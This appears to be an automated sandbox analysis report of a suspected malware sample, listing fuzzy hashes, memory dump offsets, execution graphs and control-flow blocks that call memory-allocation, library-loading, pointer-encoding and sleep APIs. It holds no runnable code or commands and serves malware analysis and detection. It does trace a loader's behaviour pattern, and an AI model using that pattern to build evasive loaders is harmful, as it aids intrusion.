                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fe9a0dd81ef1aaa8884096262e193c6d7ada8b10660d0bdcffad81c4736878b9
                                                    • Instruction ID: 95e7badbc9aa71fb6cb4ae5e47b045b6c633b91a29a8aec25f612df759598c07
                                                    • Opcode Fuzzy Hash: fe9a0dd81ef1aaa8884096262e193c6d7ada8b10660d0bdcffad81c4736878b9
                                                    • Instruction Fuzzy Hash: E611DD76908284DFCB01CF10D9C0B15FBB1FB84328F28C6ADD9495B666C33AD85ACB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.317408506.0000000000E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E1D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_e1d000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d533d3c63e14080a9ee56050eaab029bf9cf5cb948056101ffdf6e0c5fd46847
                                                    • Instruction ID: 7a6c2c14ff1b9466f9970565f590dc95b5d4215fae6e47f1825f31fe051f0476
                                                    • Opcode Fuzzy Hash: d533d3c63e14080a9ee56050eaab029bf9cf5cb948056101ffdf6e0c5fd46847
                                                    • Instruction Fuzzy Hash: 8C01DF7100C3809AE7108A26CC84BE6BB98EF41378F18851FEA056A286D3799C80CAB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.317408506.0000000000E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E1D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_e1d000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2a0e3fa4eadf754c6b6388876ef5468c95803f64ca59d21e92031836b345d487
                                                    • Instruction ID: a3db68d5d7c6a1fe7d0010af52150c6f76903ad8452b4883638ee946e8e5d307
                                                    • Opcode Fuzzy Hash: 2a0e3fa4eadf754c6b6388876ef5468c95803f64ca59d21e92031836b345d487
                                                    • Instruction Fuzzy Hash: 16F062714083849AE7148E16CC84BA3FF9CEB91778F18C45BFD086B286C3799C84CAB5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.317899710.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_29e0000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0ab653ad1152e71ac85f08be9cfc941216f9d6fa16755142083f440b9a47c019
                                                    • Instruction ID: 763e6442aedfc2c6c95a6a896dde6bae9dae8e68cec27f6da71b39d9cd62bd0c
                                                    • Opcode Fuzzy Hash: 0ab653ad1152e71ac85f08be9cfc941216f9d6fa16755142083f440b9a47c019
                                                    • Instruction Fuzzy Hash: 8112D5F1511746AAE730CF65F99E1DD3BA0B745328B90E209D2612FAE8D7B8114ACF84
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.317899710.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_29e0000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 38b66757baa0bc1bb8ef40d7aab6618a3353c296640b8c881c4f896d930372f5
                                                    • Instruction ID: c30df246c7670a33045c0d09e4a9c747f2fbe7adeaba99baf56d9353b13f7c43
                                                    • Opcode Fuzzy Hash: 38b66757baa0bc1bb8ef40d7aab6618a3353c296640b8c881c4f896d930372f5
                                                    • Instruction Fuzzy Hash: FAA17F32E0021ADFCF16DFA5C8445DEBBB6FF85300B15856AE816AB220EB71A945CF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.317899710.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_29e0000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 42d97e36ed9b127704bec646315634b18218297cdab7b01945f0c0a629260f91
                                                    • Instruction ID: 01345f119c60529885aa016edc32283d59f5d8a9a58ee08ec6c5970ff692c6ad
                                                    • Opcode Fuzzy Hash: 42d97e36ed9b127704bec646315634b18218297cdab7b01945f0c0a629260f91
                                                    • Instruction Fuzzy Hash: 2CC136B1911746AAD730DF65F88E1DD3BB1BB85328F50E209D1616BAD8DBB8104ACF84
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Execution Graph

                                                    Execution Coverage: 11%
                                                    Dynamic/Decrypted Code Coverage: 100%
                                                    Signature Coverage: 4.8%
                                                    Total number of Nodes: 62
                                                    Total number of Limit Nodes: 1
                                                    execution_graph 19312 2c54d50 19313 2c54d64 19312->19313 19316 2c553a2 19313->19316 19314 2c54d6d 19317 2c553ab 19316->19317 19322 2c55584 19316->19322 19327 2c55488 19316->19327 19332 2c55479 19316->19332 19337 2c5559e 19316->19337 19317->19314 19323 2c55537 19322->19323 19324 2c555c3 19323->19324 19342 2c55890 19323->19342 19347 2c5587f 19323->19347 19328 2c554cc 19327->19328 19329 2c555c3 19328->19329 19330 2c55890 2 API calls 19328->19330 19331 2c5587f 2 API calls 19328->19331 19330->19329 19331->19329 19333 2c55488 19332->19333 19334 2c555c3 19333->19334 19335 2c55890 2 API calls 19333->19335 19336 2c5587f 2 API calls 19333->19336 19335->19334 19336->19334 19338 2c555b1 19337->19338 19339 2c555c3 19337->19339 19340 2c55890 2 API calls 19338->19340 19341 2c5587f 2 API calls 19338->19341 19339->19339 19340->19339 19341->19339 19343 2c5589e 19342->19343 19352 2c558e0 19343->19352 19356 2c558cf 19343->19356 19344 2c558ae 19344->19324 19348 2c5589e 19347->19348 19350 2c558e0 RtlEncodePointer 19348->19350 19351 2c558cf RtlEncodePointer 19348->19351 19349 2c558ae 19349->19324 19350->19349 19351->19349 19353 2c5591a 19352->19353 19354 2c55944 RtlEncodePointer 19353->19354 19355 2c5596d 19353->19355 19354->19355 19355->19344 19357 2c558de 19356->19357 19358 2c55944 RtlEncodePointer 19357->19358 19359 2c5596d 19357->19359 19358->19359 19359->19344 19360 6925d08 19361 6925d27 LdrInitializeThunk 19360->19361 19363 6925d7a 19361->19363 19292 2c50448 19293 2c50455 19292->19293 19296 2c50878 19293->19296 19294 2c5045b 19299 2c50893 19296->19299 19298 2c509c7 19298->19294 19299->19298 19301 2c50a53 VirtualAllocExNuma 19299->19301 19304 2c5042c 19299->19304 19308 2c50554 19299->19308 19303 2c50b1b 19301->19303 19303->19294 19305 2c50b58 Sleep 19304->19305 19307 2c50bcc 19305->19307 19307->19299 19309 2c50a98 VirtualAllocExNuma 19308->19309 19311 2c50b1b 19309->19311 19311->19299 19364 2c5bcb8 19365 2c5bcd6 19364->19365 19368 2c5b894 19365->19368 19367 2c5bd0d 19370 2c5d7d8 LoadLibraryA 19368->19370 19371 2c5d8ba 19370->19371

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 438 6925d08-6925d74 LdrInitializeThunk 446 6925d7a-6925d94 438->446 447 6925ebd-6925eda 438->447 446->447 450 6925d9a-6925db4 446->450 459 6925edf-6925ee8 447->459 453 6925db6-6925db8 450->453 454 6925dba 450->454 456 6925dbd-6925e18 453->456 454->456 465 6925e1a-6925e1c 456->465 466 6925e1e 456->466 467 6925e21-6925ebb 465->467 466->467 467->459
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.555727701.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_6920000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 23c4bfe43a4371d29d87a462c7819442ced9c6304459cb18e952724800404dc8
                                                    • Instruction ID: 98349b58ef31496829c03452e06253d20c01ea4876930ef66e77d203daf4a4a6
                                                    • Opcode Fuzzy Hash: 23c4bfe43a4371d29d87a462c7819442ced9c6304459cb18e952724800404dc8
                                                    • Instruction Fuzzy Hash: 54519431B002059FCB04EFB0D888AAEB7B6BF84304F148929E512EB355EF30DD448BA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 374 2c50878-2c50891 375 2c50893-2c50896 374->375 376 2c508d9-2c508dc 375->376 377 2c50898-2c508c8 375->377 378 2c508e3-2c508e6 376->378 379 2c508de 376->379 380 2c50a2e call 2c50be8 377->380 381 2c508ce 377->381 382 2c508f4-2c508f7 378->382 383 2c508e8-2c508ea call 2c5042c 378->383 379->378 386 2c50a34 380->386 381->380 384 2c508d4 381->384 387 2c50906-2c50909 382->387 388 2c508f9 382->388 389 2c508ef 383->389 384->376 390 2c50a39-2c50a3b 386->390 391 2c50916-2c50919 387->391 392 2c5090b 387->392 395 2c50901 388->395 389->382 393 2c50a42-2c50a45 390->393 394 2c50a3d 390->394 396 2c5091b-2c5091f 391->396 397 2c5092a-2c5092d 391->397 401 2c50911 392->401 393->375 400 2c50a4b-2c50a52 393->400 394->393 395->387 402 2c50925 396->402 403 2c509d4-2c509f0 396->403 398 2c5095c-2c5095f 397->398 399 2c5092f-2c5094f call 2c50554 397->399 404 2c50961 398->404 405 2c5096c-2c5096f 398->405 422 2c50954-2c50957 399->422 401->391 402->397 413 2c509f5-2c509f8 403->413 435 2c50961 call 2c528c4 404->435 436 2c50961 call 2c527d8 404->436 408 2c50971-2c509bd 405->408 409 2c509c2-2c509c5 405->409 408->409 410 2c509c7-2c509ce 409->410 411 2c509cf-2c509d2 409->411 411->403 411->413 412 2c50967 412->405 418 2c50a1c-2c50a1f 413->418 419 2c509fa-2c50a13 413->419 420 2c50a21-2c50a28 418->420 421 2c50a29-2c50a2c 418->421 425 2c50a15-2c50a17 419->425 426 2c50a53-2c50a7a 419->426 421->380 421->390 422->398 425->418 428 2c50ac0-2c50b19 VirtualAllocExNuma 426->428 429 2c50a7c-2c50abf 426->429 431 2c50b22-2c50b3f 428->431 432 2c50b1b-2c50b21 428->432 429->428 432->431 435->412 436->412
                                                    APIs
                                                    • VirtualAllocExNuma.KERNELBASE(?,?,?,?,?,?), ref: 02C50B06
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.530464626.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2c50000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: AllocNumaVirtual
                                                    • String ID:
                                                    • API String ID: 4233825816-0
                                                    • Opcode ID: 85fec9a2281ca34ca61bf20ebb8a944890ad0d8b8a73bc795161dd92f98db6f1
                                                    • Instruction ID: d44d4b7c18e242c885668159d9a25246b71d01a180f3c661167f64f617eed687
                                                    • Opcode Fuzzy Hash: 85fec9a2281ca34ca61bf20ebb8a944890ad0d8b8a73bc795161dd92f98db6f1
                                                    • Instruction Fuzzy Hash: C481BF71E002188FDF20CBA9D8847ADBBB1EF8D324F20456AE909E7291D734DD95CB95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 503 2c5d7cc-2c5d82f 504 2c5d831-2c5d83b 503->504 505 2c5d868-2c5d8b8 LoadLibraryA 503->505 504->505 506 2c5d83d-2c5d83f 504->506 510 2c5d8c1-2c5d8f2 505->510 511 2c5d8ba-2c5d8c0 505->511 508 2c5d841-2c5d84b 506->508 509 2c5d862-2c5d865 506->509 512 2c5d84d 508->512 513 2c5d84f-2c5d85e 508->513 509->505 517 2c5d8f4-2c5d8f8 510->517 518 2c5d902 510->518 511->510 512->513 513->513 515 2c5d860 513->515 515->509 517->518 519 2c5d8fa 517->519 520 2c5d903 518->520 519->518 520->520
                                                    APIs
                                                    • LoadLibraryA.KERNELBASE(?), ref: 02C5D8A2
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.530464626.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2c50000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: a5bda58d2e3e39e50b42ec9fa2cd3d6da24fbfc18d6a77fd738893d8852bb783
                                                    • Instruction ID: 4406003f61da667abca80ceb411b561068cbbfc693d56d78408d7f642581d3d7
                                                    • Opcode Fuzzy Hash: a5bda58d2e3e39e50b42ec9fa2cd3d6da24fbfc18d6a77fd738893d8852bb783
                                                    • Instruction Fuzzy Hash: 414122B0D003198FDB14CFA9D88579DBBB1FF48714F148129E816A7380D7789885CF95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 484 2c5b894-2c5d82f 486 2c5d831-2c5d83b 484->486 487 2c5d868-2c5d8b8 LoadLibraryA 484->487 486->487 488 2c5d83d-2c5d83f 486->488 492 2c5d8c1-2c5d8f2 487->492 493 2c5d8ba-2c5d8c0 487->493 490 2c5d841-2c5d84b 488->490 491 2c5d862-2c5d865 488->491 494 2c5d84d 490->494 495 2c5d84f-2c5d85e 490->495 491->487 499 2c5d8f4-2c5d8f8 492->499 500 2c5d902 492->500 493->492 494->495 495->495 497 2c5d860 495->497 497->491 499->500 501 2c5d8fa 499->501 502 2c5d903 500->502 501->500 502->502
                                                    APIs
                                                    • LoadLibraryA.KERNELBASE(?), ref: 02C5D8A2
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.530464626.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2c50000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: 756a286c27e7b05dae97af9bfad2bf6c10e509e8fa2ca98f6a5fc37e9f26bec2
                                                    • Instruction ID: d747fd4764ab443f133a344f76bf2a94fdaef6c9169021af975bc77975628104
                                                    • Opcode Fuzzy Hash: 756a286c27e7b05dae97af9bfad2bf6c10e509e8fa2ca98f6a5fc37e9f26bec2
                                                    • Instruction Fuzzy Hash: 1D3104B0D103598FDB14CF99D885B9EBBB1FF48714F148129E816AB380D7789485CF96
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1140 2c50a83-2c50ad3 1141 2c50adb-2c50b19 VirtualAllocExNuma 1140->1141 1142 2c50b22-2c50b3f 1141->1142 1143 2c50b1b-2c50b21 1141->1143 1143->1142
                                                    APIs
                                                    • VirtualAllocExNuma.KERNELBASE(?,?,?,?,?,?), ref: 02C50B06
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.530464626.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2c50000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: AllocNumaVirtual
                                                    • String ID:
                                                    • API String ID: 4233825816-0
                                                    • Opcode ID: 1edd8cc5b0f45b274a4ce55964aff5d031ae7916c00754dccc44780661ae7502
                                                    • Instruction ID: 7fb01b0338d448c55a0fa3a51ebaa219cb9bfa56bae627500b04feefd2788eaf
                                                    • Opcode Fuzzy Hash: 1edd8cc5b0f45b274a4ce55964aff5d031ae7916c00754dccc44780661ae7502
                                                    • Instruction Fuzzy Hash: 592177B19002499FCF10CFAAC884ADEBFF4EF88324F148459E959A7210D375A945CFA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Basic blocks: 1146 [2c558cf-2c558dc], 1147 [2c558f5-2c55922], 1148 [2c558de-2c558f0], 1151 [2c55924-2c55926], 1152 [2c55928], 1153 [2c5592d-2c55938], 1154 [2c55999-2c559a6], 1155 [2c5593a-2c5596b, RtlEncodePointer], 1157 [2c55974-2c55994], 1158 [2c5596d-2c55973]
                                                    • Edges: 1146->1147, 1146->1148, 1147->1151, 1147->1152, 1148->1147, 1151->1153, 1152->1153, 1153->1154, 1153->1155, 1155->1157, 1155->1158, 1157->1154, 1158->1157
                                                    APIs
                                                    • RtlEncodePointer.NTDLL(00000000), ref: 02C5595A
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.530464626.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2c50000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: EncodePointer
                                                    • String ID:
                                                    • API String ID: 2118026453-0
                                                    • Opcode ID: 5982481d91bb4892dc5a97826ae5af5eb381026f6c175ba5f4f63efa19adc8e2
                                                    • Instruction ID: 584f6e062726e59e8b38f619025c0927d765dba376258d78b12bd16b5fa8e387
                                                    • Opcode Fuzzy Hash: 5982481d91bb4892dc5a97826ae5af5eb381026f6c175ba5f4f63efa19adc8e2
                                                    • Instruction Fuzzy Hash: 3121D0B1800348CFCB00CFA6C4483AABBF0EB45328F28802AC945E7641D7399545CF65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Basic blocks: 1160 [2c50554-2c50b19, VirtualAllocExNuma], 1163 [2c50b22-2c50b3f], 1164 [2c50b1b-2c50b21]
                                                    • Edges: 1160->1163, 1160->1164, 1164->1163
                                                    APIs
                                                    • VirtualAllocExNuma.KERNELBASE(?,?,?,?,?,?), ref: 02C50B06
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.530464626.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2c50000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: AllocNumaVirtual
                                                    • String ID:
                                                    • API String ID: 4233825816-0
                                                    • Opcode ID: 0c1fd91c9aa1054e301dc7e30be15a69422ff42693027c8c49614d9f72bae12c
                                                    • Instruction ID: 37bf24f9e5f812a0df9cd29b061eb3620fa8706cf3a93c4bee79632aae2fbf05
                                                    • Opcode Fuzzy Hash: 0c1fd91c9aa1054e301dc7e30be15a69422ff42693027c8c49614d9f72bae12c
                                                    • Instruction Fuzzy Hash: 422133B19002099FCF10CF9AC888BDEBBF4EB88324F108419E929A7210D775A954CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Basic blocks: 1167 [2c558e0-2c55922], 1170 [2c55924-2c55926], 1171 [2c55928], 1172 [2c5592d-2c55938], 1173 [2c55999-2c559a6], 1174 [2c5593a-2c5596b, RtlEncodePointer], 1176 [2c55974-2c55994], 1177 [2c5596d-2c55973]
                                                    • Edges: 1167->1170, 1167->1171, 1170->1172, 1171->1172, 1172->1173, 1172->1174, 1174->1176, 1174->1177, 1176->1173, 1177->1176
                                                    APIs
                                                    • RtlEncodePointer.NTDLL(00000000), ref: 02C5595A
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.530464626.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2c50000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: EncodePointer
                                                    • String ID:
                                                    • API String ID: 2118026453-0
                                                    • Opcode ID: f74262cc55659184f8e8c2ae477678121f53babaef262d15f1855f0bad82eb32
                                                    • Instruction ID: d39cd513b2bf35fe43b744b051defbff030a0747f379b9742130cab45fb037e3
                                                    • Opcode Fuzzy Hash: f74262cc55659184f8e8c2ae477678121f53babaef262d15f1855f0bad82eb32
                                                    • Instruction Fuzzy Hash: F811DFB1900349CFCB10DFAAD4487AEBBF4EB44324F24802AD905A7240C739A945CFA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Basic blocks: 2325 [2c5042c-2c50bca, Sleep], 2328 [2c50bd1-2c50be5], 2329 [2c50bcc]
                                                    • Edges: 2325->2328, 2325->2329, 2329->2328
                                                    APIs
                                                    • Sleep.KERNELBASE(00000000), ref: 02C50BB7
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.530464626.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2c50000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID:
                                                    • API String ID: 3472027048-0
                                                    • Opcode ID: 2c05f4b1c779831a5e4127637e5dcce56458fd91b8eaf4818db1e8c477a85c0d
                                                    • Instruction ID: bfd557a99035397f3704a93fe4cf68914d755505f4265718c023e640be5829ad
                                                    • Opcode Fuzzy Hash: 2c05f4b1c779831a5e4127637e5dcce56458fd91b8eaf4818db1e8c477a85c0d
                                                    • Instruction Fuzzy Hash: 081102B1900609CFCB10CF8AC484B9EBBF4EB88328F148459D919A7240D775A945CFA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • Sleep.KERNELBASE(00000000), ref: 02C50BB7
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.530464626.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2c50000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID:
                                                    • API String ID: 3472027048-0
                                                    • Opcode ID: 1113b0d8f2db3f067808a84c1123674fdc1b1665e92201f92d2459fff9828a31
                                                    • Instruction ID: 21be6b57843a91a7d428738f71796b5fb588f167b9ac08e6bf24b4032607febe
                                                    • Opcode Fuzzy Hash: 1113b0d8f2db3f067808a84c1123674fdc1b1665e92201f92d2459fff9828a31
                                                    • Instruction Fuzzy Hash: 6411EDB5900209CFCB10CF9AD585BEEBBF4EB88328F14845AD969A7340D774A945CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%